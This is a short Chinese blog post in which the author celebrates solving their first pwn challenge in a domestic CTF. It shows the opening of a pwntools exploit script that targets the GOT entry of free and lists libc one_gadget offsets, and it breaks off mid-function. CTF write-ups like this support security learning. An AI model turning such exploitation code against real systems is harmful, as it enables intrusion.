目录
嘿嘿,单独发纪念一下,首次在国内比赛做出一道pwn题(23/59)
hello
#!/usr/bin/env python2
# coding=utf-8
from pwn import *
arch = "amd64"
filename = "hello"
context(os="linux", arch=arch, log_level="debug")
content = 0
offset = 0
# elf
elf = ELF(filename)
free_got=elf.got['free']
# libc
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ogg_libc=[0x45226,0x4527a,0xf0364,0xf1207]
def add(num,name,size,info):
io.recvuntil("your choice>>")
io.sendline("1")
io.recvuntil("phone number:")
io.sendline(num)
io.recvuntil(